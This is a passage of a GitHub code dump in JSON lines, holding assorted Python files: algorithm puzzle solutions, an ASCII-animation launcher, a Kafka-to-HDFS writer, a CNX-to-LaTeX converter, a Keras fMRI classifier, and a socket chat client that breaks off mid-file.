n_layers=n_layers,\n dropout_rate=dropout_rate,\n device=device)\n\n def forward(self, src, trg):\n\n enc_src = self.encoder(src)\n output = self.decoder(trg, enc_src)\n\n return output\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"haesungpyun/transformer","sub_path":"model/transformer.py","file_name":"transformer.py","file_ext":"py","file_size_in_byte":1756,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"9748813758","text":"import sys\n\n\nclass Solution:\n\n def sortedSquares(self, A):\n\n pos_ptr = 0\n\n while A[pos_ptr] < 0:\n pos_ptr += 1\n\n if len(A) == 1:\n return [A[0] ** 2]\n\n neg_ptr = pos_ptr - 1\n\n squared_number = list()\n\n while len(squared_number) != len(A):\n\n # pos pointer\n if pos_ptr == len(A):\n pos_ptr_sq = sys.maxsize\n\n else:\n pos_ptr_sq = A[pos_ptr] ** 2\n\n # neg pointer\n if neg_ptr == -1:\n neg_ptr_sq = sys.maxsize\n\n else:\n neg_ptr_sq = A[neg_ptr] ** 2\n\n # comparison and update\n if pos_ptr_sq < neg_ptr_sq:\n squared_number.append(pos_ptr_sq)\n pos_ptr += 1\n\n else:\n squared_number.append(neg_ptr_sq)\n neg_ptr -= 1\n\n return squared_number\n\n\nif __name__ == \"__main__\":\n sol = Solution()\n print(sol.sortedSquares([-4, -1, 0, 3, 10]))\n","repo_name":"karthikpalavalli/Puzzles","sub_path":"leetcode/squares_of_sorted_array.py","file_name":"squares_of_sorted_array.py","file_ext":"py","file_size_in_byte":1017,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"74209671471","text":"#!/usr/bin/env python\n\"\"\"\nsimple ASCII-mation launcher\n\nA launcher for simple animations made using either\n or .\n\nusage: anim_launcher.py [-h] [--nox] [-t DELTAT] [-d DELTAD] [-z SIZE]\n [-f FILE] [-q]\n\"\"\"\nimport argparse\nimport subprocess\n\ntry:\n import Tkinter as tk\n import tkFileDialog\nexcept ImportError:\n try:\n import tkinter as tk\n from tkinter import filedialog as tkFileDialog\n except ImportError:\n pass\ntry:\n import wx\nexcept ImportError:\n pass\n\nfrom cjh.cli import Cli\nfrom cjh.config import Config\n\n__author__ = 'Chris Horn '\n__license__ = 'GPL'\n\n\n################\n# PROCEDURES #\n################\ndef _parse_args():\n \"\"\"\n Parse arguments\n (see above)\n \"\"\"\n parser = argparse.ArgumentParser(description='Simple ASCIImation Launcher')\n parser.add_argument(\n '--nox', action='store_true', help='text-based interface')\n parser.add_argument('-t', '--deltat', type=float, help='time interval')\n parser.add_argument(\n '-d', '--deltad', type=float, help='displacement interval')\n parser.add_argument('-z', '--size', type=int, help='board size')\n parser.add_argument(\n '-f', '--file', type=str,\n help='goban animation file (a python program)')\n parser.add_argument(\n '-q', action='count',\n help='-q,-qq suppress welcome message/splash screen')\n if __name__ == '__main__':\n return parser.parse_args()\n else:\n return None\n\n\ndef _set_parameters():\n \"\"\"\n Set minimum time and distance intervals.\n \"\"\"\n if ARGS is not None and ARGS.deltat is not None:\n t_interval = ARGS.deltat\n else:\n t_interval = .1\n\n if ARGS is not None and ARGS.deltad is not None:\n d_interval = ARGS.deltad\n else:\n d_interval = 2\n\n if ARGS is not None and ARGS.size is not None:\n size = ARGS.size\n elif SHELL.platform in ['android']:\n size = 7\n else:\n size = 19\n\n if ARGS is not None and ARGS.file is not None:\n cmd_list = [ARGS.file]\n\n# else: cmd_list = [SHELL.arg({'EN':'module to launch', 'EO':'modulo 
por kom\n#encigi'}[LANG])]\n# else: cmd_list = [SHELL.arg({'EN':'module to launch', 'EO':'modulo por kom\n#encigi'}[LANG])]\n\n elif SHELL.interface == 'Tk':\n cmd_list = [tkFileDialog.askopenfile(\n parent=SHELL.main_window, mode='r', filetypes=[(\n 'Python files', '*.py')], title={\n 'EN': 'Choose a file', 'EO': 'Elektu dosieron'}[LANG]).name]\n else:\n cmd_list = []\n return (t_interval, d_interval, size, cmd_list)\n\n\ndef launch_module(cmd_list):\n \"\"\"\n Play the animation.\n \"\"\"\n if SHELL.interface == 'Tk':\n cmd = [word.encode(\n 'utf-8') for word in CONFIG.config_dict['terminal'].split()] +\\\n cmd_list\n else:\n cmd = cmd_list\n\n# cmd[-1] = './%s' % cmd[-1]\n #print('Command is \"{}\"'.format(cmd))\n #Cli().wait()\n\n proc = subprocess.Popen(cmd)\n proc.wait()\n\n## Add a time counter? ##\n\n##########\n# DATA #\n##########\n\n## Prepare environment ##\n\n\n#if __name__ == '__main__':\n# if len(sys.argv[1:]) == 0:\n# sys.argv.append('-h')\n\nARGS = _parse_args()\nCONFIG = Config()\nLANG = CONFIG.get_lang_key()\n\nif ARGS is not None and ARGS.nox is True:\n SHELL = Cli()\nelse:\n SHELL = CONFIG.start_user_profile()\n if SHELL.interface in ['Tk']:\n SHELL.main_window.title(\n {'EN': 'asciimation player',\n 'EO': 'ASCII bildfilm-komencigilo'}[LANG])\n\nif SHELL.interface in ['wx', 'Tk']:\n SHELL.center_window(height_=50, width_=180)\n\nif SHELL.interface is 'Tk':\n SHELL.msg.destroy()\n PLAY = tk.Button(\n SHELL.main_window, text={'EN': 'Play', 'EO': 'Ek'}[LANG],\n command=lambda: launch_module(CMD_LIST))\n PLAY.pack(fill=tk.BOTH, expand=1)\nelif SHELL.interface is 'wx':\n PANEL = wx.Panel(SHELL.main_window, -1)\n PLAY = wx.Button(PANEL, -1, 'Play', pos=(50, 20))\n PLAY.SetDefault()\n\n## Set animation parameters ##\n\n##########\n# MAIN #\n##########\nif __name__ == '__main__':\n if ARGS is not None and ARGS.q is None:\n SHELL.welcome('Simple ASCIImation Launcher',\n \"\"\"\n A launcher for simple animations made using either cjh.Graph or\n cjh.Goban.\n \"\"\")\n\n T_INTERVAL, D_INTERVAL, SIZE_, CMD_LIST = _set_parameters()\n\n\ndef main():\n \"\"\"\n Print a welcome message on first run. If shell is Tk or wx, create a\n PLAY button.\n \"\"\"\n\n if SHELL.interface is 'Tk':\n PLAY.focus_set()\n SHELL.main_window.mainloop()\n\n elif SHELL.interface is 'wx':\n SHELL.start_app()\n\n else:\n launch_module(CMD_LIST)\n\nif __name__ == '__main__':\n main()\n","repo_name":"hammerhorn/hammerhorn-jive","sub_path":"anim_launcher/anim_launcher.py","file_name":"anim_launcher.py","file_ext":"py","file_size_in_byte":4798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"72441890992","text":"\"\"\"\n소용돌이를 예쁘게 출력하라\n\nhttps://kswims.tistory.com/138\n\n구현 문제로 문제의 조건에 맞게 코드로 구현하면 된다...\n\n우선 r2 - r1은 40보다 작거나 같고 c2-c1은 4보다 작거나 같기에 해당 크기 만큼만 배열을 만들어\n공간을 낭비하지 않도록 한다. \n\n소용돌이치는 규칙을 살펴보면 동서남북 총 4방향으로 돌고 있는데 방향이 두번 바뀔 때마다 한 방향에서\n전진해야하는 카운트가 증가한다. 이 규칙을 통해서 방향을 바꿔주며 좌표를 갱신해주면 된다.\n그리고 해당 문제는 (0,0)에서 소용돌이를 시작해야하므로 x,y 값은 실제 소용돌이가 치는(음수를 포함하는)\n좌표를 뜻하게 구현헀다. 
그런데 출력을 위해 할당한 graph에 그리기 위해서는\n음수를 포함하는 좌표를 사용할 수 없으므로 (x-r1, y-c1) 로 값을 계산해주어서 기록을 하는 범위인\n(r1, c1) ~ (r2, c2)로 매칭한다.\n\"\"\"\n \ndef solution2():\n import sys\n\n # (r1, c1) 가장 왼쪽 위, (r2, c2)는 가장 오른쪽 아래 = (행, 열)\n r1, c1, r2, c2 = map(int, sys.stdin.readline().split(\" \"))\n # 0 <= r2 - r1 <= 49, 0 <= c2 - c1 <= 4\n graph = [[0] * 5 for _ in range(50)]\n # graph 원소의 개수\n number_of_graph = (c2 - c1 + 1) * (r2 - r1 + 1)\n # 동서남북 방향을 나타냄\n dx = [-1, 0, 1, 0]\n dy = [0, -1, 0, 1]\n \n x = y = 0\n dir = 3\n dcnt = num = 1\n cnt = 0\n \n # 가장 왼쪽 위, 아래와 가장 오른쪽 위, 아래의 좌표가 채워지지 않았다면\n # while not(graph[0][0] != 0 and graph[0][c2-c1] != 0 and graph[r2-r1][0] != 0 and graph[r2-r1][c2-c1] !=0):\n # 아직 graph의 원소의 개수만큼 채우지 않았다면\n while number_of_graph != 0:\n # 범위 안에 graph가 포함될경우\n if r1 <= x <= r2 and c1 <= y <= c2:\n graph[x - r1][y - c1] = num\n number_of_graph -= 1\n \n # 현재 숫자 및 전진 count 증가\n num += 1\n cnt += 1\n \n # 방향에 따라서 x, y 좌표 이동\n x = x + dx[dir]\n y = y + dy[dir]\n \n # 전진해야하는 카운트와 같다면\n if cnt == dcnt:\n cnt = 0\n # 방향 계산\n dir = (dir + 1) % 4\n # 동쪽 또는 서쪽으로 간다면 전진해야하는 카운트 증가\n if dir == 3 or dir == 1:\n dcnt += 1\n \n cnt = 0\n \n # num은 현재 최댓값 -> 자릿수 계산\n while num > 0:\n num //= 10\n cnt += 1 # 출력폭을 찾기 위해서\n \n for i in range(r2 - r1 + 1):\n for j in range(c2 - c1 + 1):\n print(str(graph[i][j]).rjust(cnt), end=\" \")\n print()\n \nsolution2()","repo_name":"dhtmaks2540/LeetCode-Algorithm","sub_path":"baekjoon_problems/implementation/1022.py","file_name":"1022.py","file_ext":"py","file_size_in_byte":2836,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"1290135747","text":"from kafka import KafkaConsumer\nfrom datetime import datetime, timedelta\nimport time\nfrom hdfs import InsecureClient\nimport pandas as pd\nimport json\n\nhost = 'hdfs://vm-dlake2-m-1.test.local'\n\npath = '/user/grushevskiy/fb_data/'\n\nconsumer = KafkaConsumer('fb_grushevskiy', bootstrap_servers='vm-strmng-s-1.test.local:9092',\n group_id='group_src_1', value_deserializer=lambda m: json.loads(m.decode('utf-8')))\n\nclient = InsecureClient(host, user='grushevskiy')\n\ni = 0\nfor message in consumer:\n val = []\n dict = json.loads(message.value)\n for key in dict:\n val.append(dict[key])\n i = +1\n if i == 480000:\n i = 0\n df = pd.DataFrame(val)\n with client.write(path + str(datetime.now())+'.csv') as writer:\n df.to_csv(writer, index=False, sep=';')\n\nconsumer.close()\n","repo_name":"IlyaGrushevsky/Final_battle","sub_path":"csv_to_hdfs.py","file_name":"csv_to_hdfs.py","file_ext":"py","file_size_in_byte":834,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"31260929459","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nParse each index.cnxml.html found in each module to latex format\n\n.. $Id$\n\"\"\"\n\nfrom __future__ import print_function, unicode_literals, absolute_import, division\n__docformat__ = \"restructuredtext en\"\n\nlogger = __import__('logging').getLogger(__name__)\n\nimport os\nimport codecs\nimport simplejson as json\n\nfrom lxml import html\n\nfrom ..util import rename_filename\n\nfrom ..renders.LaTeX.base import base_renderer\n\nfrom .. import scoped_registry\n\nfrom .xml_reader import CNX_XML\n\nfrom .adapters.run_adapter import adapt\n\nfrom . 
import cnx_glossary\n\n\nclass CNXParser(object):\n\n def __init__(self, input_file, output_directory):\n cnx_xml = CNX_XML()\n self.collection = cnx_xml.read_xml(input_file)\n self.image_list = []\n self.latex_filenames = []\n self.content_folder = [] # will be use to retrieve images or pdf\n self.latex_main_files = u''\n\n head, _ = os.path.split(input_file)\n self.cnx_directory = head\n self.output_directory = output_directory\n scoped_registry.output_directory = output_directory\n self.tex_filepath = []\n\n def process_collection(self):\n collection = self.collection\n self.metadata = collection.metadata\n\n if u'title' in self.metadata:\n title = rename_filename(self.metadata[u'title'])\n self.latex_main_files = u'MAIN_%s.tex' % title\n scoped_registry.book_title = title\n\n content = collection.content\n if content.modules:\n self.process_modules(content.modules,\n type_=u'collection')\n\n subcollections = content.subcollections\n if subcollections:\n for subcollection in subcollections:\n self.process_subcollection(subcollection)\n\n self.create_main_latex()\n\n def process_modules(self, modules, type_=None, latex_filename=None):\n result = []\n result_append = result.append\n for module in modules:\n if type_ == u'collection':\n scoped_registry.cnx_glossary = []\n doc_content = self.process_document(module.document)\n tex_filename = u'%s.tex' % rename_filename(module.title)\n self.latex_filenames.append(tex_filename)\n doc_content = self.process_glossary(doc_content)\n attribution = self.get_attribution()\n if attribution is not None:\n doc_content = u'%s\\n\\n%s' % (doc_content, attribution)\n self.write_to_file(doc_content, tex_filename)\n elif type_ == u'subcollection':\n doc_content = self.process_document(module.document)\n result_append(doc_content)\n if type_ == u'subcollection':\n return u''.join(result)\n\n def process_document(self, document_folder):\n logger.info(u'________________________________________')\n logger.info(u'Process document %s', document_folder)\n tex_content = u''\n if len(self.cnx_directory) == 0:\n folder = u'%s' % (document_folder)\n else:\n folder = u'%s/%s' % (self.cnx_directory, document_folder)\n scoped_registry.current_dir = folder\n self.content_folder.append(folder)\n cnxml_html_file = u'%s/index.cnxml.html' % (folder)\n logger.info(cnxml_html_file)\n if os.path.exists(cnxml_html_file):\n with codecs.open(cnxml_html_file, 'r', 'utf-8') as file_:\n doc_fragment = html.fromstring(file_.read())\n cnx_html_body = adapt(doc_fragment, self)\n tex_content = base_renderer(cnx_html_body)\n attribution = self.get_attribution()\n if attribution is not None:\n tex_content = u'%s\\n\\n%s' % (tex_content, attribution)\n logger.info(u'________________________________________')\n return u'%s\\n\\n' % tex_content\n\n def process_subcollection(self, subcollection):\n scoped_registry.cnx_glossary = []\n tex_filename = u'%s.tex' % rename_filename(subcollection.title)\n self.latex_filenames.append(tex_filename)\n\n content = subcollection.content\n if content.modules:\n subcollection_content = self.process_modules(content.modules,\n type_=u'subcollection',\n latex_filename=tex_filename)\n subcollection_content = self.process_glossary(subcollection_content)\n chapter = u'\\\\chaptertitlesuppressed{%s}\\n' % (subcollection.title)\n subcollection_content = u'%s\\n%s' % (chapter, subcollection_content)\n self.write_to_file(subcollection_content, tex_filename)\n\n def write_to_file(self, content, filename, type_=None):\n if type_ is None:\n filepath = u'%s/%s' % 
(self.output_directory, filename)\n self.tex_filepath.append(filepath)\n with codecs.open(filepath, 'w', 'utf-8') as file_:\n file_.write(content)\n\n def create_main_latex(self):\n main_tex_content = generate_main_tex_content(self.metadata, self.latex_filenames)\n self.write_to_file(main_tex_content, self.latex_main_files)\n\n def process_glossary_(self):\n latex_files = self.tex_filepath\n glossary_dict = cnx_glossary.create_glossary_dictionary(\n scoped_registry.cnx_glossary)\n json_file = u'%s/glossary.json' % (self.output_directory)\n self.dictionary_to_json(glossary_dict, json_file)\n for file_ in latex_files:\n cnx_glossary.lookup_glossary_term_in_tex_file(file_,\n glossary_dict,\n search_text=None)\n\n def process_glossary(self, content):\n glossary_dict = cnx_glossary.create_glossary_dictionary(\n scoped_registry.cnx_glossary)\n return cnx_glossary.lookup_glossary_term_in_content(content,\n glossary_dict,\n search_text=None)\n\n def dictionary_to_json(self, dictionary, json_file):\n \"\"\"\n save dictionary to json file\n \"\"\"\n dict_json = json.dumps(dictionary, sort_keys=True, indent=4 * ' ')\n with codecs.open(json_file, 'w', 'utf-8') as fp:\n fp.write(dict_json)\n\n def get_attribution(self):\n if u'content-url' in self.metadata:\n atthref = self.metadata[u'content-url']\n attribution = u'\\\\subsection{Attribution}\\n\\\\textbf{Original book can be downloaded at \\\\href{%s}{%s}}' % (\n atthref, atthref)\n return attribution\n\n\ndef get_packages():\n LATEX_PACKAGES = [\n u'graphix',\n u'hyperref',\n u'ulem',\n u'Tabbing',\n u'textgreek',\n u'amsmath',\n u'nticourse',\n u'ntilatexmacros',\n u'ntiassessment',\n u'ntislidedeck',\n u'ntiglossary',\n ]\n package_list = []\n package_list_append = package_list.append\n for package in LATEX_PACKAGES:\n string = u'\\\\usepackage{%s}\\n' % (package)\n package_list_append(string)\n return u''.join(package_list)\n\n\ndef get_included_tex(included_tex_list):\n result = []\n result_append = result.append\n for tex in included_tex_list:\n inc = u'\\\\include{%s}\\n' % (tex)\n result_append(inc)\n return u''.join(result)\n\n\ndef generate_main_tex_content(metadata, included_tex_list):\n title = u'\\\\title{%s}\\n' % metadata[u'title'] if 'title' in metadata else u''\n author = get_book_authors(metadata)\n author = u'\\\\author{%s}\\n' % author if author is not None else u''\n package = get_packages()\n latex = get_included_tex(included_tex_list)\n return u'\\\\documentclass{book}\\n%s%s%s\\\\begin{document}\\n%s\\\\end{document}' % (\n package, title, author, latex)\n\n\ndef get_book_authors(metadata):\n if u'actors' in metadata:\n actors = metadata[u'actors']\n if u'person' in actors:\n person = actors[u'person']\n if u'fullname' in person:\n return person[u'fullname']\n\n\ndef main():\n cnx_parser = CNXParser(u'collection.xml')\n cnx_parser.process_collection()\n logger.info(cnx_parser.latex_main_files)\n logger.info(cnx_parser.latex_filenames)\n logger.info(cnx_parser.content_folder)\n\nif __name__ == '__main__':\n main()\n","repo_name":"OpenNTI/nti.contenttools","sub_path":"src/nti/contenttools/cnx/cnx_parser.py","file_name":"cnx_parser.py","file_ext":"py","file_size_in_byte":8504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"25091416989","text":"import keras\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Activation, Dropout, Flatten, Conv2D, MaxPooling2D, LocallyConnected2D\nfrom keras.layers.normalization import BatchNormalization\nfrom keras 
import optimizers\nfrom keras.engine.topology import Layer\nfrom sklearn.model_selection import StratifiedKFold\nfrom keras.callbacks import EarlyStopping, ModelCheckpoint\nfrom keras import backend as K\nimport numpy as np\nimport os\nfrom rfe_sensitivity_flat_ABIDE import compute_deeplift_scores\nfrom sklearn.model_selection import train_test_split\nfrom utils import prepare_dataset_abide_matrices_masked \nimport tensorflow as tf\nfrom matplotlib import pyplot as plt\nfrom pylab import savefig\nfrom sklearn import metrics\nimport sys\n\nclass Hadamard(Layer):\n\n    def __init__(self, **kwargs):\n        self.name = 'Hadamard'\n        self.trainable = True\n        super(Hadamard, self).__init__(**kwargs)\n\n    def build(self, input_shape):\n        # Create a trainable weight variable for this layer.\n        self.kernel = self.add_weight(name='kernel', \n                                      shape= input_shape[1:],\n                                      initializer= keras.initializers.RandomUniform(minval=0.05, maxval=1, seed=None),\n                                      trainable=True)\n        super(Hadamard, self).build(input_shape)\n\n    def call(self, x):\n        print(x.shape, self.kernel.shape)\n        print ('self.kernel: ', self.kernel)\n        out = np.multiply(x,self.kernel)\n        print ('x * self.kernel', out)\n        print ('out.shape', out.shape)\n\n        return out\n\n    def compute_output_shape(self, input_shape):\n        print(input_shape)\n        return input_shape\n\ndef modular_rearrangement_Graclus(X, perm):\n    X_new = []\n    N = X[0].shape[0]\n\n    for x in X:\n        new_x = np.zeros((perm.shape[0], perm.shape[0]))\n\n        for new_node_1, old_node_1 in enumerate(perm):\n            for new_node_2, old_node_2 in enumerate(perm):\n                if old_node_1 < N and old_node_2 < N :\n                    new_x[new_node_1, new_node_2] = x[old_node_1, old_node_2]\n                else: \n                    new_x[new_node_1, new_node_2] = 0\n        \n        X_new.append(new_x) \n\n    non_zero_rows = np.where(perm < N)[0]\n\n    X_reduced = []\n\n    for sample in X_new:\n        reduced_matrix = sample[np.ix_(non_zero_rows, non_zero_rows)]\n        X_reduced.append(reduced_matrix)\n\n    return np.array(X_reduced)\n\ndef random_rearrangement(X, module_vector):\n    num_nodes = X[0].shape[0]\n    new_order = np.random.choice(num_nodes, size=num_nodes, replace=False)\n\n    mapping = dict() # key is the row (represented by node index) in the original connectivity matrix and value is the corresponding row in connectivity rearranged matrix\n    \n    for node in range(num_nodes):\n        mapping[node] = new_order[node]\n    \n    X_new = []\n\n    for x in X:\n        new_x = np.zeros(x.shape)\n        for old_node_1 in mapping.keys():\n            new_node_1 = mapping[old_node_1]\n            for old_node_2 in mapping.keys():\n                new_node_2 = mapping[old_node_2]\n                new_x[new_node_1, new_node_2] = x[old_node_1, old_node_2]\n        \n        X_new.append(new_x)\n\n    return np.array(X_new), new_order\n    \ndef normalize_data(X, max_, min_):\n    for i in range(X.shape[0]): \n        X[i] = (X[i] - min_)/(max_ - min_)\n\n    return X\n\ndef standardize_data(X, mean_, std_):\n    for i in range(X.shape[0]):\n        X[i] = (X[i] - mean_)\n    return X\n\ndef flatten_data(X):\n    num_features = int((X.shape[1]) * (X.shape[1] - 1) * 0.5)\n    X_flattened = np.empty((X.shape[0], num_features))\n\n    for i, matrix in enumerate(X):\n        matrix_lower_triangular = matrix[np.triu_indices(np.shape(matrix)[0],1)]\n        X_flattened[i] = np.ravel(matrix_lower_triangular, order=\"C\")\n\n    return X_flattened\n\ndef funcNetFFN_1L(input_shape, dropout, batch_size):\n    model = keras.models.Sequential()\n    model.add(Dense(5, activation='relu', input_dim=input_shape))\n    model.add(Dropout(rate=dropout))\n    model.add(Dense(2))\n    model.add(Activation('softmax'))\n    return model\n\n\ndef funcNetFFN_2L(input_shape, dropout, batch_size):\n    model = keras.models.Sequential()\n    model.add(Dense(50, activation='relu', input_dim=input_shape))\n    model.add(Dropout(rate=dropout))\n    model.add(Dense(10, activation='relu'))\n    model.add(Dropout(rate=dropout))\n    model.add(Dense(2))\n    model.add(Activation('softmax'))\n    return model\n    \ndef generate_compunded_neurons(multipler, number_of_values):\n    neuron_list = []\n    start = 1\n    count = 0\n    while(number_of_values):\n        neuron_list.append(start * (multipler ** count))\n        count += 1\n        number_of_values -= 1\n\n    return neuron_list\n\ndef custom_categorical_crossentropy(l1, layer_0_weights, from_logits=False):\n    def orig_loss(y_true, y_pred):\n        return K.categorical_crossentropy(y_true, y_pred) + l1 * K.sum(K.abs(layer_0_weights))\n    return orig_loss\n\nclass_subset = 'ABIDE'\nmode = 'modular'\nmodel_type = sys.argv[1] # funcNetFFN_1L funcNetFFN_2L\nseeds = range(10, 20)\ngpu_id = '3'\n\nTARGET_DIRECTORY = './' + model_type + '/'\n\nif not os.path.isdir(TARGET_DIRECTORY):\n    print(\"Folder that will store the results cannot be found.\")\n    print(\"Creating the results folder in \" + TARGET_DIRECTORY)\n    os.makedirs(TARGET_DIRECTORY)\n\nos.environ[\"CUDA_DEVICE_ORDER\"]= \"PCI_BUS_ID\"\nos.environ[\"CUDA_VISIBLE_DEVICES\"]= gpu_id\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\n\nconfig = tf.ConfigProto()\nconfig.gpu_options.allow_growth = True\nsess = tf.Session(config=config)\nkeras.backend.set_session(sess)\n\nif not os.path.isdir(TARGET_DIRECTORY):\n    print(\"Folder that will store the results cannot be found.\")\n    print(\"Creating the results folder in \" + TARGET_DIRECTORY)\n    os.makedirs(TARGET_DIRECTORY)\n\n\nfor SEED in seeds:\n    mask = np.ones(34716)\n    thresholds = np.array([1.0, 1.0]) # generate_compunded_neurons(0.9, 23) #np.linspace(1, 0.1, 10)\n    X_prev, Y_prev = [], []\n    for ix, i in enumerate(thresholds):\n        ## Model parameters\n        epochs = 100 # there's early stopping\n        batch_size = 8\n        learning_rate =0.0001\n        decay = 0.001\n        dropout = 0.1\n        folds = 5\n        np.random.seed(SEED)\n\n        if ix == 0:\n            (X,Y) = prepare_dataset_abide_matrices_masked(np.ones((264, 264)))\n            if model_type == 'funcNetFFN_1L' or model_type == 'funcNetFFN_2L':\n                X = flatten_data(X)\n\n        else:\n            threshold_1 = thresholds[ix-1]\n            threshold_2 = thresholds[ix]\n            prev_threshold = thresholds[ix-1]\n            prev_best_model = TARGET_DIRECTORY + 'best_model_seed_' + str(SEED) + '_' + str(class_subset) + '_' + model_type + '_' + mode + '_' + str(prev_threshold) + '.h5'\n            sensitivity_filename, mask = compute_deeplift_scores(class_subset + '_' + model_type + '_' + mode + '_SEED_' + str(SEED), X_prev, Y_prev, prev_best_model, 0, 1, 0, mask, gpu_id, threshold_1, threshold_2)\n            (X,Y) = prepare_dataset_abide_matrices_masked(np.ones((264, 264)))\n            X_flat = flatten_data(X)\n            num_features = int(np.sum(mask))\n            X = []\n            for matrix in X_flat:\n                masked_matrix = np.multiply(matrix, mask)\n                X.append(masked_matrix[mask == 1])\n            X = np.array(X)\n\n        print ('Shape of input data', X.shape)\n        print ('Number of features', num_features)\n\n        idx = np.arange(len(X))\n        np.random.shuffle(idx) # randomize index\n        X, Y = X[idx], Y[idx] # randomize/shuffle dataset\n        \n        input_shape = X[0].shape\n        all_fold_accuracies = []\n        \n        skf = StratifiedKFold(n_splits=folds, shuffle=True, random_state=SEED)\n        fold_count = 0\n        model_filename_list = []\n        train_indices, val_indices = [], []\n        for train_index, val_index in skf.split(X, Y.argmax(1)):\n            train_indices.append(train_index)\n            val_indices.append(val_index)\n            X_train, Y_train = X[train_index], Y[train_index]\n            X_val, Y_val = X[val_index], 
Y[val_index]\n\n if model_type != 'funcNetFFN_1L' and model_type != 'funcNetFFN_2L':\n print(\"Invalid model type\")\n exit()\n\n # Define model\n if model_type == 'funcNetFFN_1L':\n input_shape = X.shape[1]\n model = funcNetFFN_1L(input_shape, dropout, batch_size)\n loss_fn = \"categorical_crossentropy\"\n elif model_type == 'funcNetFFN_2L':\n input_shape = X.shape[1]\n model = funcNetFFN_2L(input_shape, dropout, batch_size)\n loss_fn = \"categorical_crossentropy\"\n\n Adam = optimizers.Adam(lr=learning_rate) #, decay=decay\n\n if loss_fn == 'custom':\n model.compile(loss= custom_categorical_crossentropy(0.001, model.layers[0].get_weights()[0]), optimizer=Adam, metrics=[\"accuracy\"])\n else:\n model.compile(loss= \"categorical_crossentropy\", optimizer=Adam, metrics=[\"accuracy\"])\n\n model_filename = TARGET_DIRECTORY + 'best_model_seed_' + str(SEED) + '_' + str(class_subset) + '_' + model_type + '_' + mode + '_' + str(i) + '_fold_' + str(fold_count) + '.h5'\n model_filename_list.append(model_filename)\n callbacks = [ModelCheckpoint(filepath=model_filename, monitor='val_acc', save_best_only=True)]\n\n # Train model\n history = model.fit(X_train, Y_train, batch_size=batch_size, callbacks=callbacks, epochs=epochs, validation_data=(X_val, Y_val), verbose=1)\n score = model.evaluate(X_val, Y_val, batch_size=batch_size)\n \n best_val_acc = max(history.history['val_acc'])\n best_epoch = history.history['val_acc'].index(max(history.history['val_acc']))\n model.load_weights(model_filename)\n\n best_prediction = model.predict(X_val, batch_size=batch_size, verbose=1)\n MAE = metrics.mean_absolute_error(Y_val, best_prediction, sample_weight=None, multioutput='uniform_average')\n AUC = metrics.roc_auc_score(Y_val, best_prediction, average='macro', sample_weight=None, max_fpr=None)\n\n print(SEED, 'best accuracy original: ', best_val_acc, 'loaded: ', model.evaluate(X_val, Y_val, batch_size=batch_size), 'at epoch ', best_epoch, 'MAE ', MAE, 'AUC ', AUC)\n\n all_fold_accuracies.append(best_val_acc)\n\n with open(TARGET_DIRECTORY + model_type + '_' + mode + '_kfold_training_logs_' + class_subset + '.csv', 'a') as out_stream:\n out_stream.write(str(SEED) + ', ' + str(i) + ', ' + str(fold_count) + ', ' + str(best_epoch) + ', ' + str(best_val_acc) + ', ' + str(MAE) + ', ' + str(AUC) + '\\n')\n\n keras.backend.clear_session()\n fold_count += 1\n\n best_fold = all_fold_accuracies.index(max(all_fold_accuracies))\n best_model_name = model_filename_list[best_fold]\n print('Fold number ' + str(best_fold) + ' has the highest accuracy score of ' + str(max(all_fold_accuracies)))\n\n val_index = val_indices[best_fold]\n X_, Y_ = prepare_dataset_abide_matrices_masked(np.ones((264, 264)))\n\n if model_type == 'funcNetFFN_1L' or model_type == 'funcNetFFN_2L':\n X_ = flatten_data(X_)\n\n X_prev, Y_prev = X_[val_index], Y_[val_index]\n\n for model_file_fold in model_filename_list:\n if model_file_fold != best_model_name:\n os.remove(model_file_fold)\n else:\n filename = TARGET_DIRECTORY + 'best_model_seed_' + str(SEED) + '_' + str(class_subset) + '_' + model_type + '_' + mode + '_' + str(i) + '.h5'\n os.rename(model_file_fold, filename)\n","repo_name":"nimiew/isbi2020","sub_path":"funcNetFFN_kfold_ABIDE.py","file_name":"funcNetFFN_kfold_ABIDE.py","file_ext":"py","file_size_in_byte":11803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"6544779054","text":"#!/user/bin/python3\n# guest.py\n\nimport sys, socket, signal, select, termios, tty\n\nserverFile = 
open(\"serverinfo.txt\", \"r\")\nserver = serverFile.readline().strip()\nport = serverFile.readline().strip()\nport = int(port)\nserverFile.close()\n\nguestsocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nguestsocket.connect((server, port))\n\n#send guest identifier\nguestIdentifier = \"guest\"\nguestsocket.send(guestIdentifier.encode(\"ascii\"))\n\n#get the list of host names from the server\nhostNames = guestsocket.recv(1024).decode(\"utf-8\").strip()\nprint(\"guest: list of hostnames: \" + hostNames)\n\nhostChoice = input(\"Enter host name to join: \")\n\nguestsocket.send(hostChoice.encode(\"ascii\"))\nrawHostAddress = guestsocket.recv(1024).decode(\"utf-8\").strip()\nprint(\"guest: received host address \" + rawHostAddress + \" from server.\")\n\nguestsocket.close()\nportFlag = True\nhostAddress = \"\"\nhostPort = \"\"\nfor x in rawHostAddress:\n\tif x in \"() '\\n\\t\":\n\t\tcontinue\n\telif x == ',':\n\t\tportFlag = False\n\telse:\n\t\tif portFlag:\n\t\t\thostAddress += x\n\t\telse:\n\t\t\thostPort += x\n\nguestsocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nguestsocket.connect((hostAddress, int(hostPort)))\n\nguestsocket.setblocking(False)\n\noldSettings = termios.tcgetattr(sys.stdin)\ntry:\n\ttty.setcbreak(sys.stdin.fileno())\n\n# main host/guest communication loop\n\twhile True:\n\t\tif select.select([sys.stdin], [], [], 0) == 